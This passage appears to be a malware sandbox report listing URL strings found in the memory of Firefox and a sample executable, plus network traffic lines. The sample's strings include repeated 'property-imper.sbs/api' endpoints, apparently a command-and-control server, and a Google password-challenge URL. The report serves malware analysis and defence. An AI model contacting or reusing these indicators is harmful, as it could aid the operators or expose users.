Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2336750459.0000027292733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2481024204.0000027292728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttp://win.mail.ru/cgi-bin/sentmsg?mailto=%sgecko.handlerServ
Source: firefox.exe, 00000019.00000002.2479828969.0000027292470000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 00000019.00000002.2478820802.000002729133C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2462000461.000002728F0B6000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2336750459.0000027292733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2481024204.0000027292728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000019.00000002.2479828969.0000027292470000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 00000019.00000002.2479828969.0000027292470000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2336750459.0000027292733000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2481024204.0000027292728000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s_finalizeInternal/
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000019.00000002.2478820802.0000027291394000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com/
Source: f20b4c0961.exe, 00000009.00000003.2240820571.00000000011A3000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2245857584.00000000011A6000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2240996818.00000000011A5000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.s
Source: f20b4c0961.exe, 00000009.00000003.2189000814.0000000001176000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2216205547.0000000001176000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2187778263.0000000001176000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2294043967.0000000001161000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2363128747.0000000000700000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2402388484.0000000000700000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2545220716.0000000000721000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2321917430.0000000000704000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2686958822.000000000071A000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2429429740.0000000000700000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2321730162.00000000006FD000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000002.2763484000.0000000000713000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/
Source: f20b4c0961.exe, 00000009.00000003.2240820571.0000000001176000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/--
Source: f20b4c0961.exe, 00000009.00000003.2349009212.000000000116C000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2294043967.0000000001161000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/.
Source: f20b4c0961.exe, 00000009.00000003.2272289947.00000000011A3000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/G
Source: f20b4c0961.exe, 0000000B.00000003.2496347730.0000000000721000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2546312685.00000000006BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api
Source: f20b4c0961.exe, 0000000B.00000003.2545220716.0000000000721000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2496347730.0000000000721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api1Q
Source: f20b4c0961.exe, 0000000B.00000003.2401085437.00000000053E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api60882-
Source: f20b4c0961.exe, 00000009.00000003.2349296434.000000000118C000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2272672432.000000000118A000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2272465396.0000000001185000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/api97hbPq.
Source: f20b4c0961.exe, 0000000B.00000003.2545220716.0000000000721000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2496347730.0000000000721000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apiBQl
Source: f20b4c0961.exe, 00000009.00000003.2418853686.00000000011A1000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apio
Source: f20b4c0961.exe, 00000009.00000003.2245740133.0000000001181000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2240820571.0000000001176000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apirsionA
Source: f20b4c0961.exe, 00000009.00000003.2216205547.0000000001176000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apirsionn
Source: f20b4c0961.exe, 00000009.00000003.2241194022.0000000001191000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2240974672.0000000001190000.00000004.00000020.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2240820571.0000000001176000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apis
Source: f20b4c0961.exe, 00000009.00000003.2240820571.0000000001176000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs/apite
Source: f20b4c0961.exe, 0000000B.00000002.2763484000.0000000000678000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://property-imper.sbs:443/apiicrosoft
Source: firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000019.00000002.2561348786.000002729AF47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/fullHashes:find?$ct=application/x-protobuf&key=AIzaSyC7jsptDS
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2561348786.000002729AF47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://safebrowsing.googleapis.com/v4/threatListUpdates:fetch?$ct=application/x-protobuf&key=AIzaSy
Source: firefox.exe, 00000019.00000002.2478820802.000002729133C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com
Source: firefox.exe, 00000019.00000003.2334950209.0000027292B73000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2481912376.0000027292816000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://screenshots.firefox.com/setButtons/buttonElem.onclick
Source: firefox.exe, 00000019.00000002.2511368823.0000027294477000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://services.addons.mozilla.org/api/v4/addons/addon
Source: firefox.exe, 00000019.00000002.2509125101.00000272943E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com
Source: firefox.exe, 00000019.00000002.2509125101.00000272943E8000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/
Source: firefox.exe, 00000019.00000002.2509125101.0000027294376000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://shavar.services.mozilla.com/downloads?client=navclient-auto-ffox&appver=118.0&pver=2.2
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/facebook.svg
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://smartblock.firefox.etp/play.svg
Source: firefox.exe, 00000019.00000003.2408822675.000002729B3A7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2396489947.000002729B3A7000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com
Source: firefox.exe, 00000019.00000003.2407614644.000002729B6D4000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2579254717.000002729D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/
Source: firefox.exe, 00000019.00000003.2407614644.000002729B6D4000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs#l
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/spocs:stateChangeProcessEnqueue:
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2579254717.000002729D203000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/user
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://spocs.getpocket.com/userplaces.frecency.pages.alternative.mediumWeight
Source: firefox.exe, 00000019.00000002.2528820121.0000027294996000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2516262256.0000027294810000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-js
Source: firefox.exe, 00000019.00000002.2516262256.000002729480A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2516262256.0000027294810000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://static.adsafeprotected.com/firefox-etp-pixel
Source: firefox.exe, 00000019.00000002.2478820802.000002729133C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2489207640.0000027293034000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2393247432.0000027293B7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=panel-def
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/%VERSION%/%OS%/%LOCALE%/switching-devices?utm_source=spotlight
Source: firefox.exe, 00000019.00000002.2536942361.000002729509A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/1/firefox/118.0.1/WINNT/en-US/
Source: firefox.exe, 00000019.00000002.2478820802.000002729130E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/captive-portal
Source: firefox.exe, 00000019.00000002.2492921640.0000027293227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: firefox.exe, 00000019.00000002.2546346933.000002729608A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings
Source: firefox.exe, 00000019.00000002.2550341180.0000027296166000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/refresh-firefox-reset-add-ons-and-settings2
Source: f20b4c0961.exe, 0000000B.00000003.2404404803.00000000054FF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
Source: firefox.exe, 00000019.00000002.2492921640.0000027293227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.elMx_wJzrE6l
Source: firefox.exe, 00000019.00000002.2478820802.000002729133C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://truecolors.firefox.com
Source: firefox.exe, 00000019.00000002.2581974745.00001B65AB404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com
Source: firefox.exe, 00000019.00000002.2482727507.0000027292903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2481912376.0000027292816000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://twitter.com/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://watch.sling.com/
Source: firefox.exe, 00000019.00000002.2562253478.000002729B02E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://webpack.js.org/concepts/mode/)
Source: firefox.exe, 00000019.00000002.2482727507.00000272929D9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2482727507.00000272929E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://weibo.com/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.aliexpress.com/images/duckduckgo-com
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.co.uk/
Source: firefox.exe, 00000019.00000002.2482727507.0000027292903000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/
Source: firefox.exe, 00000019.00000002.2458618765.000002728E7AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_15d7e4b694824b33323940336fbf0bead57d89764383fe44
Source: firefox.exe, 00000019.00000002.2489207640.000002729307E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/browser.search.separatePrivateDefaultbrowser.sear
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://global/content/elements/notificationbox.
Source: firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: f20b4c0961.exe, 00000009.00000003.2164246966.00000000059F6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2164154796.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2323732828.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2324028280.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2322878077.0000000005419000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: firefox.exe, 00000019.00000002.2489207640.000002729307E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000019.00000003.2396489947.000002729B3F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000019.00000003.2407614644.000002729B61E000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/searchcb8e7210-9f0b-48fa-8708-b9a03df79eeacbe309e0-f638-4996-9dfc-ea
Source: f20b4c0961.exe, 00000009.00000003.2164246966.00000000059F6000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 00000009.00000003.2164154796.00000000059F9000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2323732828.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2324028280.0000000005416000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2322878077.0000000005419000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: firefox.exe, 00000019.00000002.2482727507.0000027292903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/search__instrumentation_summary
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/searchnimbus-desktop-experiments
Source: firefox.exe, 00000019.00000002.2479828969.0000027292470000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.hulu.com/watch/
Source: firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ifeng.com/
Source: firefox.exe, 00000019.00000002.2479828969.0000027292470000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://www.instagram.com/
Source: firefox.exe, 00000019.00000002.2458618765.000002728E7AD000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.invisalign.com/?utm_source=admarketplace&utm_medium=paidsearch&utm_campaign=Invisalign&u
Source: firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.iqiyi.com/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.leboncoin.fr/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2489207640.0000027293017000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mobilesuica.com/
Source: f20b4c0961.exe, 00000009.00000003.2218484812.00000000059E2000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2403955754.000000000541E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2469501678.000002728FEFA000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2569395137.000002729B611000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2400926046.000002729B163000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2489207640.0000027293034000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2583142865.0000276436404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2569395137.000002729B60B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000019.00000002.2562253478.000002729B0A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2491386104.0000027293125000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2403228491.000002729B0D1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/
Source: firefox.exe, 00000019.00000002.2492921640.0000027293227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.0JoCxlq8ibGr
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2393247432.0000027293B7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/legal/terms/mozilla/firefox-desktop-no-feature-firefox-desktop-release
Source: firefox.exe, 00000019.00000002.2492921640.0000027293227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.Tgc_vjLFc3HK
Source: firefox.exe, 00000019.00000002.2492921640.0000027293227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: firefox.exe, 00000019.00000003.2390665678.0000027294882000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/mobile/get-app/?utm_medium=firefox-desktop&utm_source=onboarding-mod
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/#suggest-relevant-contentP
Source: firefox.exe, 00000019.00000003.2407614644.000002729B658000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/V
Source: f20b4c0961.exe, 00000009.00000003.2219127331.0000000005AEE000.00000004.00000800.00020000.00000000.sdmp, f20b4c0961.exe, 0000000B.00000003.2404404803.00000000054FF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2492921640.0000027293227000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000019.00000002.2539916257.00000272952DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2580378242.0000038C3EC4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000019.00000002.2482727507.00000272929E5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.olx.pl/
Source: firefox.exe, 00000019.00000002.2459836507.000002728E8DF000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.openh264.org/
Source: firefox.exe, 00000019.00000002.2482727507.0000027292903000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2481912376.0000027292816000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2491386104.0000027293127000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.reddit.com/
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.sling.com/
Source: firefox.exe, 00000019.00000002.2580378242.0000038C3EC4D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.tsn.ca
Source: firefox.exe, 00000019.00000002.2481912376.0000027292816000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.youtube.com/
Source: firefox.exe, 00000019.00000002.2482727507.00000272929E5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.zhihu.com/
Source: firefox.exe, 00000019.00000002.2581974745.00001B65AB404000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://yandex.com
Source: firefox.exe, 00000019.00000002.2562253478.000002729B0A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000003.2404400667.0000027294F9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2536047644.0000027294F9E000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2516262256.0000027294803000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2501228599.0000027293C81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com
Source: firefox.exe, 00000019.00000002.2562253478.000002729B0A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2553999746.00000272963DC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2535380451.0000027294E89000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/
Source: firefox.exe, 00000019.00000003.2407614644.000002729B680000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000017.00000002.2316708107.000001CF2EB57000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2324397577.0000019409547000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser
Source: firefox.exe, 00000019.00000002.2456139673.00000272847AA000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.2456139673.00000272847E4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdMOZ_CRASHREPORTER_RE
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdUnable
Source: firefox.exe, 00000019.00000002.2516262256.0000027294862000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdhttp://mozilla.org/#
Source: firefox.exe, 00000019.00000002.2463002114.000002728F172000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwdmoz-extension://8bba
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49865
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49817 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49864
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49985
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49742
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49863
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49984
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49982
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49860
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49981
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown Network traffic detected: HTTP traffic on port 49932 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49898 -> 443
